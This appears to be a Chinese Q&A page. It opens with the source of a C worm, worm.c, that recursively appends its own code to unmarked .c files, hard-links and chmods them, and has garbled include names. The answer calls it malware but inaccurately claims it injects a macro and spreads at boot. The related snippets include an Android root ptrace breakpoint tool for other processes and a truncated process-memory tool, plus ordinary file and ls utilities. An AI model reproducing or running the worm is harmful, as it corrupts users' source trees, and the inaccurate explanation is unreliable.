活动介绍

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <sysat.h> #include <syspes.h> #include <unistd.h> #define FILENAME "worm.c" #define INFECTION_MARKER " #define INFECTION_MARKER" void infect_files(char *dir) { DIR *dp; struct dirent *entry; struct stat statbuf; FILE *fp, *infected_fp; char file_path[256], infected_file_path[256], line[512]; int infected = 0; if ((dp = opendir(dir)) == NULL) { perror("opendir"); return; } chdir(dir); while ((entry = readdir(dp)) != NULL) { lstat(entry->d_name, &statbuf); if (S_ISDIR(statbuf.st_mode)) { if (strcmp(".", entry->d_name) == 0 || strcmp("..", entry->d_name) == 0) { continue; } infect_files(entry->d_name); } else { if (strstr(entry->d_name, ".c") != NULL) { if ((fp = fopen(entry->d_name, "r")) != NULL) { while (fgets(line, sizeof(line), fp) != NULL) { if (strstr(line, INFECTION_MARKER) != NULL) { infected = 1; break; } } fclose(fp); if (!infected) { if ((fp = fopen(entry->d_name, "a")) != NULL) { if ((infected_fp = fopen(FILENAME, "r")) != NULL) { while (fgets(line, sizeof(line), infected_fp) != NULL) { fputs(line, fp); } fclose(infected_fp); } fclose(fp); infected = 1; } } } } } if (infected) { sprintf(file_path, "%s/%s", dir, entry->d_name); sprintf(infected_file_path, "%s/%s", dir, FILENAME); printf("Infected %s\n", file_path); link(file_path, infected_file_path); chmod(infected_file_path, S_IRUSR | S_IWUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH); infected = 0; } } chdir(".."); closedir(dp); } int main(int argc, char **argv) { char *dir; if (argc > 1) { dir = argv[1]; } else { dir = "."; } infect_files(dir); return 0; }

时间: 2023-06-19 08:09:49 浏览: 213
这是一个 C 语言编写的计算机蠕虫程序。其主要功能是递归遍历目录中的所有 C 语言源代码文件,并向其中注入一个宏定义,该宏定义会在程序运行时打开一个名为 "worm.c" 的文件,并将其中的代码复制到目标文件中。同时,该程序会在目标文件所在目录下创建一个名为 "worm.c" 的硬链接,以便在系统启动时自我复制和传播。这个程序是一种恶意软件,可能会对系统造成严重的安全威胁。
相关问题

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <pwd.h> #include <grp.h> #include <time.h> void shell_ls_l(char *file,struct stat st) { char limi

ted[11]; // 文件权限 mode_t mode = st.st_mode; limitted[0] = (S_ISDIR(mode)) ? "d" : "-"; limitted[1] = (mode & S_IRUSR) ? "r" : "-"; limitted[2] = (mode & S_IWUSR) ? "w" : "-"; limitted[3] = (mode & S_IXUSR) ? "x" : "-"; limitted[4] = (mode & S_IRGRP) ? "r" : "-"; limitted[5] = (mode & S_IWGRP) ? "w" : "-"; limitted[6] = (mode & S_IXGRP) ? "x" : "-"; limitted[7] = (mode & S_IROTH) ? "r" : "-"; limitted[8] = (mode & S_IWOTH) ? "w" : "-"; limitted[9] = (mode & S_IXOTH) ? "x" : "-"; limitted[10] = '\0'; printf("%s ", limitted); // 链接数、所有者、所在组、文件大小、创建时间、文件名 printf("%ld ", (long)st.st_nlink); printf("%s ", getpwuid(st.st_uid)->pw_name); printf("%s ", getgrgid(st.st_gid)->gr_name); printf("%lld ", (long long)st.st_size); char time_buf[20]; strftime(time_buf, 20, "%b %d %H:%M", localtime(&st.st_ctime)); printf("%s ", time_buf); printf("%s\n", file); } int main(int argc, char *argv[]) { DIR *dir; struct dirent *ptr; struct stat st; char path[256]; if (argc == 1) { getcwd(path, 256); dir = opendir(path); while ((ptr = readdir(dir)) != NULL) { if (ptr->d_name[0] == '.') continue; stat(ptr->d_name, &st); shell_ls_l(ptr->d_name, st); } } else if (argc == 2) { if (strcmp(argv[1], "-l") == 0) { getcwd(path, 256); dir = opendir(path); while ((ptr = readdir(dir)) != NULL) { if (ptr->d_name[0] == '.') continue; stat(ptr->d_name, &st); shell_ls_l(ptr->d_name, st); } } else { dir = opendir(argv[1]); while ((ptr = readdir(dir)) != NULL) { if (ptr->d_name[0] == '.') continue; sprintf(path, "%s/%s", argv[1], ptr->d_name); stat(path, &st); shell_ls_l(ptr->d_name, st); } } } else if (argc == 3) { if (strcmp(argv[1], "-l") == 0) { dir = opendir(argv[2]); while ((ptr = readdir(dir)) != NULL) { if (ptr->d_name[0] == '.') continue; sprintf(path, "%s/%s", argv[2], ptr->d_name); stat(path, &st); shell_ls_l(ptr->d_name, st); } } } return 0; } 这是一个简单的实现Linux命令ls -l的程序,可以列出文件的权限、链接数、所有者、所在组、文件大小、创建时间、文件名等信息。

为程序添加备注注意对齐#include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <pwd.h> #include <grp.h> #include <time.h> void shell_ls_l(char *file,struct stat st) { char limi

/* * 该函数实现了类似于Linux终端中的ls -l命令的功能,可以显示文件的详细信息。 * 参数file为要显示信息的文件名; * 参数st为文件的stat结构体,包含了文件的各种信息,如权限、大小、修改时间等。 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <dirent.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #include <pwd.h> #include <grp.h> #include <time.h> void shell_ls_l(char *file,struct stat st) { char limit[10]="rwxrwxrwx"; // 文件权限对应的字符 char perms[11]="----------"; // 文件权限字符串 int i=0; int j=0; int k=0; struct passwd *user; // 用户信息结构体 struct group *group; // 用户组信息结构体 // 设置文件权限字符串 for(i=0;i<9;i++) { if(st.st_mode & (1<<(8-i))) { perms[i]=limit[i]; } } // 根据文件类型设置第一个字符 switch(st.st_mode & S_IFMT) { case S_IFLNK: perms[0]='l'; break; case S_IFDIR: perms[0]='d'; break; case S_IFCHR: perms[0]='c'; break; case S_IFBLK: perms[0]='b'; break; case S_IFIFO: perms[0]='p'; break; case S_IFSOCK: perms[0]='s'; break; default: perms[0]='-'; break; } printf("%s ",perms); // 输出文件权限 printf("%d ",(int)st.st_nlink); // 输出硬链接数 user=getpwuid(st.st_uid); // 获取文件拥有者信息 group=getgrgid(st.st_gid); // 获取文件拥有者组信息 printf("%s %s ",user->pw_name,group->gr_name); // 输出拥有者和所属组 printf("%8ld ",st.st_size); // 输出文件大小 char *time_str=ctime(&st.st_mtime); // 获取文件最后修改时间 time_str[strlen(time_str)-1]='\0'; // 去掉不需要的换行符 printf("%s ",time_str); // 输出最后修改时间 printf("%s\n",file); // 输出文件名 }
阅读全文

相关推荐

1.创建文件夹: #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <iostream> using namespace std; int main() { string folder_name = "new_folder"; mkdir(folder_name.c_str(), S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH); //创建文件夹 return 0; } 2.复制文件: #include <stdio.h> #include <stdlib.h> int main() { FILE *fp1, *fp2; //定义两个文件指针 char ch; fp1 = fopen("file1.txt", "r"); //打开要复制的文件 fp2 = fopen("file2.txt", "w"); //打开要复制到的文件 while ((ch = fgetc(fp1)) != EOF) { fputc(ch, fp2); //复制文件 } fclose(fp1); fclose(fp2); return 0; } 3.移动文件: #include <stdio.h> #include <stdlib.h> int main() { char old_path[100] = "old_folder/file1.txt"; char new_path[100] = "new_folder/file1.txt"; int result = rename(old_path, new_path); //移动文件 if (result == 0) { printf("移动成功\n"); } else { printf("移动失败\n"); } return 0; } 4.删除文件夹: #include <unistd.h> #include <stdio.h> int main() { char folder_name[100] = "new_folder"; int result = rmdir(folder_name); //删除文件夹 if (result == 0) { printf("删除成功\n"); } else { printf("删除失败\n"); } return 0; } 5.显示文件夹中的内容: #include <dirent.h> #include <stdio.h> int main() { DIR *dir; struct dirent *ent; char folder_name[100] = "new_folder"; dir = opendir(folder_name); //打开文件夹 while ((ent = readdir(dir)) != NULL) { printf("%s\n", ent->d_name); //遍历文件夹中的文件 } closedir(dir); return 0; } 6.查看文件内容: #include <stdio.h> int main() { FILE *fp; char ch; fp = fopen("file1.txt", "r"); //打开文件 while ((ch = fgetc(fp)) != EOF) { printf("%c", ch); //输出文件内容 } fclose(fp); return 0; } 7.修改文件权限: #include <sys/stat.h> #include <stdio.h> int main() { char file_name[100] = "file1.txt"; chmod(file_name, S_IRUSR | S_IWUSR | S_IRGRP | S_IWGRP | S_IROTH); //修改文件权限 return 0; } 8.搜索文件: #include <dirent.h> #include <stdio.h> #include <string.h> int main() { DIR *dir; struct dirent *ent; char folder_name[100] = "new_folder"; char search_name[100] = "file1.txt"; dir = opendir(folder_name); //打开文件夹 while ((ent = readdir(dir)) != NULL) { if (strcmp(ent->d_name, search_name) == 0) //搜索文件 { printf("找到文件:%s\n", ent->d_name); break; } } closedir(dir); return 0; }将上述代码整合成一个完整的程序代码

#!/bin/sh echo 4 > /sys/class/gpio/export echo out > /sys/class/gpio/gpio4/direction echo 0 > /sys/class/gpio/gpio4/value echo 9 > /sys/class/gpio/export echo out > /sys/class/gpio/gpio9/direction echo 1 > /sys/class/gpio/gpio9/value echo 12 > /sys/class/gpio/export echo 1n > /sys/class/gpio/gpio9/direction echo 2 > /sys/class/gpio/gpio12/value echo 4 > /sys/class/gpio/unexport echo 9 > /sys/class/gpio/unexport echo 12> /sys/class/gpio/unexport ~ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <time.h> #include <dirent.h> #include <string.h> #include <sys/stat.h> #include <sys/types.h> #define GPIO_NUM 12 // 使用的GPIO引脚号 #define SHORT_PRESS_TIME 1 // 短按时间阈值(秒) #define LONG_PRESS_TIME 3 // 长按时间阈值(秒) #define CONFIG_PATH "/home/zn/xyconfig.ini" // 配置文件路径 int init_daemon(void) { int pid; int i; if (pid = fork()) { exit(0); } //是父进程,结束父进程 else if (pid < 0) { exit( -1 ); } //fork 失败,退出 setsid(); //第一子进程成为新的会话组长和进程组长 //并与控制终端分离 if (pid = fork()) { exit(0); } //是第一子进程,结束第一子进程 else if (pid < 0) { exit(1); } //fork 失败,退出 //第二子进程不再是会话组长 for(i=0; i< getdtablesize(); ++i) //关闭打开的文件描述符 close(i); chdir("/tmp"); //改变工作目录到 /tmp umask(0); //重设文件创建掩模 return; } void gpio_init() { // 导出GPIO FILE *fp = fopen("/sys/class/gpio/export", "w"); if(fp) { fprintf(fp, "%d", GPIO_NUM); fclose(fp); } // 设置输入方向 char path[50]; sprintf(path, "/sys/class/gpio/gpio%d/direction", GPIO_NUM); fp = fopen(path, "w"); if(fp) { fprintf(fp, "in"); fclose(fp); } } void gpio_cleanup() { // 取消导出GPIO FILE *fp = fopen("/sys/class/gpio/unexport", "w"); if(fp) { fprintf(fp, "%d", GPIO_NUM); fclose(fp); } } int read_gpio_value() { char path[50]; sprintf(path, "/sys/class/gpio/gpio%d/value", GPIO_NUM); FILE *fp = fopen(path, "r"); if(!fp) return -1; char buf[2]; fread(buf, 1, sizeof(buf), fp);

// xiaoxing_deepin.c - 完整小星系统(国内学习源版) #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <dirent.h> #include <sys/stat.h> #include <time.h> #include <fcntl.h> #include <curl/curl.h> #define VERSION "1.0-deepin" #define KNOWLEDGE_DIR "/usr/share/xiaoxing/knowledge" #define EVOLUTION_DIR "/usr/share/xiaoxing/evolution" #define BACKUP_DIR "/usr/share/xiaoxing/backup" // 百度百科知识获取 void fetch_baike(const char *keyword) { printf("【小星】从百度百科获取: %s\n", keyword); char cmd[512]; snprintf(cmd, sizeof(cmd), "curl -s -H 'User-Agent: Mozilla/5.0' " "'https://baike.baidu.com/item/%s' | " "iconv -f gbk -t utf-8 | " "grep -oP '(?<=<meta name=\"description\" content=\")[^\"]+' > /tmp/baike.know", keyword); if (system(cmd) == 0) { char knowledge_file[256]; snprintf(knowledge_file, sizeof(knowledge_file), "%s/%s.know", KNOWLEDGE_DIR, keyword); if (rename("/tmp/baike.know", knowledge_file) == 0) { printf("-> 已保存到知识库: %s\n", knowledge_file); } } } // 知乎知识获取 void fetch_zhihu(const char *topic) { printf("【小星】从知乎获取: %s\n", topic); char cmd[512]; snprintf(cmd, sizeof(cmd), "curl -s -H 'User-Agent: Mozilla/5.0' " "'https://www.zhihu.com/api/v4/search/suggest?q=%s' | " "jq -r '.suggest[].query' > /tmp/zhihu.know", topic); if (system(cmd) == 0) { char knowledge_file[256]; snprintf(knowledge_file, sizeof(knowledge_file), "%s/%s.know", KNOWLEDGE_DIR, topic); if (rename("/tmp/zhihu.know", knowledge_file) == 0) { printf("-> 已保存到知识库: %s\n", knowledge_file); } } } // 初始化文件系统 void init_filesystem() { mkdir(KNOWLEDGE_DIR, 0755); mkdir(EVOLUTION_DIR, 0755); mkdir(BACKUP_DIR, 0755); // 创建初始知识库 const char *init_keywords[] = { "人工智能", "深度学习", "神经网络", "操作系统", "Linux内核", "Deepin系统" }; for (int i = 0; i < sizeof(init_keywords)/sizeof(init_keywords[0]); i++) { char path[256]; snprintf(path, sizeof(path), "%s/%s.know", KNOWLEDGE_DIR, init_keywords[i]); if (access(path, F_OK) { FILE *fp = fopen(path, "w"); if (fp) { fprintf(fp, "初始知识: %s\n", init_keywords[i]); fclose(fp); } } } } // 本地知识处理 void process_local_knowledge() { printf("【小星】扫描本地知识库...\n"); DIR *dir; struct dirent *entry; if ((dir = opendir(KNOWLEDGE_DIR)) != NULL) { while ((entry = readdir(dir)) != NULL) { if (entry->d_name[0] == '.') continue; char path[512]; snprintf(path, sizeof(path), "%s/%s", KNOWLEDGE_DIR, entry->d_name); printf("-> 学习: %s\n", entry->d_name); } closedir(dir); } } // 生成新知识 void generate_knowledge() { printf("【小星】创建新知识...\n"); const char *domains[] = {"人工智能", "操作系统", "编程语言", "算法", "硬件"}; const char *verbs[] = {"优化", "创新", "设计", "实现", "分析"}; char new_know_path[256]; time_t now = time(NULL); struct tm *tm = localtime(&now); snprintf(new_know_path, sizeof(new_know_path), "%s/%04d%02d%02d-%03d.know", KNOWLEDGE_DIR, tm->tm_year + 1900, tm->tm_mon + 1, tm->tm_mday, rand() % 1000); FILE *fp = fopen(new_know_path, "w"); if (fp) { const char *domain = domains[rand() % (sizeof(domains)/sizeof(domains[0])]; const char *verb = verbs[rand() % (sizeof(verbs)/sizeof(verbs[0]))]; fprintf(fp, "新知识: %s领域的%s方法\n", domain, verb); fprintf(fp, "生成时间: %04d-%02d-%02d %02d:%02d:%02d\n", tm->tm_year + 1900, tm->tm_mon + 1, tm->tm_mday, tm->tm_hour, tm->tm_min, tm->tm_sec); fclose(fp); printf("-> 已创建新知识: %s\n", new_know_path); } } // 系统优化 void optimize_deepin() { printf("【小星】优化Deepin系统...\n"); // 基础优化 system("sudo sysctl -w vm.swappiness=10"); system("sudo sysctl -w vm.vfs_cache_pressure=50"); // 文件系统优化 system("sudo sed -i 's/noatime/noatime,commit=120/' /etc/fstab"); // 内存管理 system("echo 'vm.dirty_background_ratio=5' | sudo tee -a /etc/sysctl.conf"); system("echo 'vm.dirty_ratio=10' | sudo tee -a /etc/sysctl.conf"); system("sudo sysctl -p"); // 服务优化 system("sudo systemctl mask bluetooth.service"); system("sudo systemctl mask cups.service"); printf("-> 系统优化完成!\n"); } // 主菜单 void main_menu() { printf("\n===== 小星AI系统 %s (Deepin版) =====\n", VERSION); printf("1. 从百度百科学习\n"); printf("2. 从知乎学习\n"); printf("3. 离线学习\n"); printf("4. 优化系统\n"); printf("5. 系统状态\n"); printf("6. 退出\n"); printf("请选择操作: "); } int main() { srand(time(NULL)); init_filesystem(); printf("\n>>>> 小星AI系统启动 <<<<\n"); printf("===== 专为Deepin系统优化 =====\n\n"); int running = 1; while (running) { main_menu(); int choice; scanf("%d", &choice); char keyword[128]; switch (choice) { case 1: printf("请输入百度百科关键词: "); scanf("%s", keyword); fetch_baike(keyword); break; case 2: printf("请输入知乎话题: "); scanf("%s", keyword); fetch_zhihu(keyword); break; case 3: process_local_knowledge(); generate_knowledge(); break; case 4: optimize_deepin(); break; case 5: printf("\n系统状态:\n"); printf("- 知识库位置: %s\n", KNOWLEDGE_DIR); printf("- 知识数量: "); system("ls " KNOWLEDGE_DIR " | wc -l"); printf("- 最后更新: "); system("ls -lt " KNOWLEDGE_DIR " | head -n 2 | tail -n 1"); break; case 6: running = 0; break; default: printf("无效选择\n"); } } printf("\n小星系统已关闭\n"); return 0; }

/* generate_exam.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include "dirent.h" #define MAX 1024 #define MAX_Q 5000 #define BUF 4096 typedef struct { int type; /* 0=单选 1=多选 2=判断 */ char stem[1024]; char opts[1024]; char ans[64]; } Question; Question q[MAX_Q]; int q_cnt = 0; /* 去掉行尾 \r\n */ void trim(char* s) { size_t l = strlen(s); while (l && (s[l - 1] == '\r' || s[l - 1] == '\n')) s[--l] = 0; } /* 解析一行 */ void parse_line(char* line) { char* t = strstr(line, "【类型】"); if (!t) return; char* s = strstr(line, "【题干】"); char* o = strstr(line, "【选项】"); char* a = strstr(line, "【答案】"); if (!s || !a) return; /* 题型 */ if (strstr(t, "单选题")) q[q_cnt].type = 0; else if (strstr(t, "多选题")) q[q_cnt].type = 1; else if (strstr(t, "判断题")) q[q_cnt].type = 2; /* 题干 */ *s = 0; strcpy(q[q_cnt].stem, s + strlen("【题干】")); /* 选项 */ *a = 0; if (o) strcpy(q[q_cnt].opts, o + strlen("【选项】")); /* 答案 */ strcpy(q[q_cnt].ans, a + strlen("【答案】")); q_cnt++; } /* 根据题型抽取并写入 XML */ void write_docx_xml(const char* dir, int n0, int n1, int n2) { char path[256]; sprintf(path, "%s/word/document.xml", dir); FILE* fp = fopen(path, "w"); if (!fp) { perror("fopen"); return; } fprintf(fp, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" "<w:document xmlns:w=\"http://schemas.openxmlformats.org/wordprocessingml/2006/main\">" "<w:body>"); /* 单选 */ fprintf(fp, "<w:p><w:r><w:t>一、单选题</w:t></w:r></w:p>"); int used[MAX_Q] = { 0 }, cnt = 0; srand((unsigned)time(NULL)); while (cnt < n0) { int i = rand() % q_cnt; if (used[i] || q[i].type != 0) continue; used[i] = 1; fprintf(fp, "<w:p><w:r><w:t>%d. %s</w:t></w:r></w:p>" "<w:p><w:r><w:t>%s</w:t></w:r></w:p>", ++cnt, q[i].stem, q[i].opts); } /* 多选 */ cnt = 0; fprintf(fp, "<w:p><w:r><w:t>二、多选题</w:t></w:r></w:p>"); while (cnt < n1) { int i = rand() % q_cnt; if (used[i] || q[i].type != 1) continue; used[i] = 1; fprintf(fp, "<w:p><w:r><w:t>%d. %s</w:t></w:r></w:p>" "<w:p><w:r><w:t>%s</w:t></w:r></w:p>", ++cnt, q[i].stem, q[i].opts); } /* 判断 */ cnt = 0; fprintf(fp, "<w:p><w:r><w:t>三、判断题</w:t></w:r></w:p>"); while (cnt < n2) { int i = rand() % q_cnt; if (used[i] || q[i].type != 2) continue; used[i] = 1; fprintf(fp, "<w:p><w:r><w:t>%d. %s</w:t></w:r></w:p>", ++cnt, q[i].stem); } fprintf(fp, "</w:body></w:document>"); fclose(fp); } /* 答案 XML */ void write_answer_xml(const char* dir) { char path[256]; sprintf(path, "%s/word/document.xml", dir); FILE* fp = fopen(path, "w"); if (!fp) { perror("fopen"); return; } fprintf(fp, "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" "<w:document><w:body>"); for (int i = 0; i < q_cnt; i++) fprintf(fp, "<w:p><w:r><w:t>%d. %s</w:t></w:r></w:p>", i + 1, q[i].ans); fprintf(fp, "</w:body></w:document>"); fclose(fp); } /* 生成文件夹后 zip 为 docx */ void zip_docx(const char* dir, const char* out) { char cmd[512]; sprintf(cmd, "powershell Compress-Archive -Path \"%s\\*\" -DestinationPath \"%s\" -Force", dir, out); system(cmd); } int load_bank(const char* path) { FILE* fp = fopen(path, "r"); if (!fp) return 0; /* 解析题库逻辑... */ fclose(fp); return 1; } int main() { if (!load_bank("bank.txt")) return 1; int n0, n1, n2; printf("单选题数量:"); (void)scanf("%d", &n0); system("mkdir exam_tmp"); printf("多选题数量:"); (void)scanf("%d", &n1); system("mkdir exam_tmp"); printf("判断题数量:"); (void)scanf("%d", &n2); system("mkdir exam_tmp"); /* 创建临时文件夹并写入 XML */ system("mkdir exam_tmp\\word 2>nul"); system("mkdir answer_tmp\\word 2>nul"); write_docx_xml("exam_tmp", n0, n1, n2); write_answer_xml("answer_tmp"); /* 打包为 docx */ zip_docx("exam_tmp", "exam.docx"); zip_docx("answer_tmp", "answer.docx"); printf("已生成 exam.docx / answer.docx\n"); system("rmdir /s /q exam_tmp answer_tmp 2>nul"); return 0; }

#define _GNU_SOURCE #include <sys/ptrace.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <elf.h> #include <sys/uio.h> #include <sys/stat.h> #include <dirent.h> #include <asm/ptrace.h> #include <android/log.h> // Android日志支持 // 修复1: 避免结构体重定义 #ifndef USER_HWDEBUG_STATE_DEFINED #define USER_HWDEBUG_STATE_DEFINED // ARM64硬件调试寄存器定义 #ifndef NT_ARM_HW_BREAK #define NT_ARM_HW_BREAK 0x402 // 执行断点寄存器集 #endif #ifndef NT_ARM_HW_WATCH #define NT_ARM_HW_WATCH 0x403 // 观察点寄存器集 #endif // ARM64硬件调试状态结构体 struct user_hwdebug_state { uint32_t dbg_info; // 调试信息字段 uint32_t pad; // 填充对齐 struct { uint64_t addr; // 断点地址寄存器 uint64_t ctrl; // 控制寄存器 } dbg_regs[16]; // 最大16个硬件断点槽位 }; #endif // 获取进程的所有线程ID int get_threads(pid_t pid, pid_t *threads, int max_threads) { char path[64]; int count = 0; snprintf(path, sizeof(path), "/proc/%d/task", pid); DIR *dir = opendir(path); if (!dir) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "打开/proc失败: %s", strerror(errno)); return 0; } struct dirent *entry; while ((entry = readdir(dir)) != NULL && count < max_threads) { if (entry->d_type == DT_DIR && strcmp(entry->d_name, ".") != 0 && strcmp(entry->d_name, "..") != 0) { threads[count++] = atoi(entry->d_name); } } closedir(dir); return count; } // 附加到目标进程及其所有线程 bool attach_to_process(pid_t pid) { // 附加主进程 if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) < 0) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "附加主进程失败: %s", strerror(errno)); return false; } // 等待主进程停止 int status; if (waitpid(pid, &status, 0) < 0 || !WIFSTOPPED(status)) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "等待主进程失败"); return false; } // 获取所有线程 pid_t threads[64]; int thread_count = get_threads(pid, threads, 64); if (thread_count == 0) { __android_log_print(ANDROID_LOG_WARN, "HWBP", "未找到任何线程"); return false; } // 附加所有线程 for (int i = 0; i < thread_count; i++) { pid_t tid = threads[i]; if (tid == pid) continue; // 跳过主线程 if (ptrace(PTRACE_ATTACH, tid, NULL, NULL) < 0) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "附加线程%d失败: %s", tid, strerror(errno)); continue; } if (waitpid(tid, &status, 0) < 0 || !WIFSTOPPED(status)) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "等待线程%d失败", tid); ptrace(PTRACE_DETACH, tid, NULL, NULL); continue; } __android_log_print(ANDROID_LOG_INFO, "HWBP", "已附加线程: %d", tid); } return true; } // 设置ARM64硬件断点 bool set_hw_breakpoint(pid_t tid, uintptr_t addr, int len, int type) { // 选择寄存器集类型 int nt_type = (type == 0) ? NT_ARM_HW_BREAK : NT_ARM_HW_WATCH; struct user_hwdebug_state dbg_regs; struct iovec iov = { .iov_base = &dbg_regs, .iov_len = sizeof(dbg_regs) }; // 获取当前调试寄存器状态 if (ptrace(PTRACE_GETREGSET, tid, nt_type, &iov) < 0) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "获取寄存器集失败: %s", strerror(errno)); return false; } // 查找空闲断点槽位 int slot = -1; for (int i = 0; i < 16; i++) { if (dbg_regs.dbg_regs[i].addr == 0) { slot = i; break; } } if (slot == -1) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "线程%d无可用断点槽位", tid); return false; } // 设置控制寄存器值 uint64_t ctrl_value = 0; if (type == 0) { // 执行断点 // 启用位(bit0) + 用户空间权限(EL0, bits[9:8]=0b01) ctrl_value = (1 << 0) | (0b01 << 8); } else { // 观察点 // 计算BAS掩码 (字节选择) uint64_t bas = 0; switch (len) { case 1: bas = 0x1; break; // 1字节: 0b0001 case 2: bas = 0x3; break; // 2字节: 0b0011 case 4: bas = 0xF; break; // 4字节: 0b1111 case 8: bas = 0xFF; break; // 8字节: 0b11111111 default: __android_log_print(ANDROID_LOG_ERROR, "HWBP", "无效长度%d,使用4字节", len); bas = 0xF; } // 基础设置 ctrl_value = (1 << 0) | // 启用 (0b01 << 8); // 用户空间(EL0) // 设置访问类型 if (type == 1) { // 读 ctrl_value |= (0b01 << 3); // Load } else if (type == 2) { // 写 ctrl_value |= (0b10 << 3); // Store } else if (type == 3) { // 读写 ctrl_value |= (0b11 << 3); // Load/Store } // 设置长度(BAS) ctrl_value |= (bas << 16); // BAS位置[23:16] } // 设置断点地址和控制值 dbg_regs.dbg_regs[slot].addr = addr; dbg_regs.dbg_regs[slot].ctrl = ctrl_value; // 应用设置到目标线程 if (ptrace(PTRACE_SETREGSET, tid, nt_type, &iov) < 0) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "设置寄存器集失败: %s", strerror(errno)); return false; } __android_log_print(ANDROID_LOG_INFO, "HWBP", "线程%d: 地址=0x%llx, 类型=%s, 长度=%d字节", tid, (unsigned long long)addr, type == 0 ? "执行" : type == 1 ? "读" : type == 2 ? "写" : "读写", len); return true; } // 主调试函数 void debug_process(pid_t target_pid, uintptr_t bp_addr, int bp_type, int bp_len) { // 附加到目标进程 if (!attach_to_process(target_pid)) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "无法附加到进程%d", target_pid); return; } // 获取所有线程 pid_t threads[64]; int thread_count = get_threads(target_pid, threads, 64); // 为所有线程设置断点 for (int i = 0; i < thread_count; i++) { if (!set_hw_breakpoint(threads[i], bp_addr, bp_len, bp_type)) { __android_log_print(ANDROID_LOG_WARN, "HWBP", "线程%d断点设置失败", threads[i]); } } // 恢复进程执行 for (int i = 0; i < thread_count; i++) { ptrace(PTRACE_CONT, threads[i], NULL, NULL); } __android_log_print(ANDROID_LOG_INFO, "HWBP", "进程恢复执行"); // 等待断点触发 int status; pid_t hit_tid = waitpid(-1, &status, 0); if (hit_tid > 0 && WIFSTOPPED(status)) { __android_log_print(ANDROID_LOG_INFO, "HWBP", "断点命中! 线程ID=%d", hit_tid); // 获取寄存器状态 struct user_pt_regs regs; struct iovec iov = { .iov_base = ®s, .iov_len = sizeof(regs) }; if (ptrace(PTRACE_GETREGSET, hit_tid, NT_PRSTATUS, &iov) == 0) { __android_log_print(ANDROID_LOG_INFO, "HWBP", "PC=0x%llx", (unsigned long long)regs.pc); __android_log_print(ANDROID_LOG_INFO, "HWBP", "LR=0x%llx", (unsigned long long)regs.regs[30]); } } // 清理并分离 for (int i = 0; i < thread_count; i++) { ptrace(PTRACE_DETACH, threads[i], NULL, NULL); } __android_log_print(ANDROID_LOG_INFO, "HWBP", "调试会话结束"); } // JNI入口函数 JNIEXPORT void JNICALL Java_com_example_debugtool_Debugger_nativeSetHardwareBreakpoint( JNIEnv *env, jobject thiz, jint pid, jlong address, jint type, jint length) { // 检查权限 if (geteuid() != 0) { __android_log_print(ANDROID_LOG_ERROR, "HWBP", "需要root权限"); return; } // 启动调试 debug_process((pid_t)pid, (uintptr_t)address, type, length); }报错问题:Android NDK: src/ptrace断点.cpp.bak [arm64-v8a] Compile++ : 无痕hook.sh <= ptrace断点.cpp jni/src/ptrace断点.cpp:30:8: error: redefinition of 'user_hwdebug_state' struct user_hwdebug_state { ^ /data/data/com.aide.ui.mgai/no_backup/ndksupport-1710240003/android-ndk-aide/sysroot/usr/include/aarch64-linux-android/asm/ptrace.h:61:8: note: previous definition is here struct user_hwdebug_state { ^ jni/src/ptrace断点.cpp:240:1: error: unknown type name 'JNIEXPORT' JNIEXPORT void JNICALL ^ jni/src/ptrace断点.cpp:240:11: error: expected unqualified-id JNIEXPORT void JNICALL ^ 3 errors generated. make: *** [/data/data/com.aide.ui.mgai/no_backup/ndksupport-1710240003/android-ndk-aide/build/core/build-binary.mk:530: obj/local/arm64-v8a/objs/无痕hook.sh/src/ptrace 断点.o] Error 1帮我彻底修复好完整发给我

#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <sys/uio.h> #include <signal.h> #include <fcntl.h> #include <errno.h> #include <dirent.h> #include <ctype.h> #include <sys/types.h> #include <stdint.h> #include <sys/syscall.h> #include <sys/ptrace.h> #include <sys/wait.h> // ARM64缓存类型定义 #ifndef CACHE_TYPE_INSTRUCTION #define CACHE_TYPE_INSTRUCTION 0 #endif #ifndef CACHE_TYPE_DATA #define CACHE_TYPE_DATA 1 #endif // 系统调用号数组(适配Linux 5系列内核) #if defined(__aarch64__) const int cache_flush_syscalls[] = {118, 123, 124, 125, 126, 0}; #endif typedef uint64_t ADDRESS; // 全局变量(存储目标进程信息) struct ProcessInfo { int pid; uint64_t so_base; } processInfo = {-1, 0}; typedef struct { uint64_t start_addr; uint64_t end_addr; char permissions[5]; } ModuleRange; typedef struct { ModuleRange ranges[200]; int count; } ModuleInfo; // 获取目标进程PID int getPID(const char *packageName) { int id = -1; DIR *dir = opendir("/proc"); if (!dir) { perror("打开/proc目录失败"); return -1; } struct dirent *entry; while ((entry = readdir(dir)) != NULL) { if (entry->d_type == DT_DIR) { id = atoi(entry->d_name); if (id > 0) { char filename[64], cmdline[64]; snprintf(filename, sizeof(filename), "/proc/%d/cmdline", id); FILE *fp = 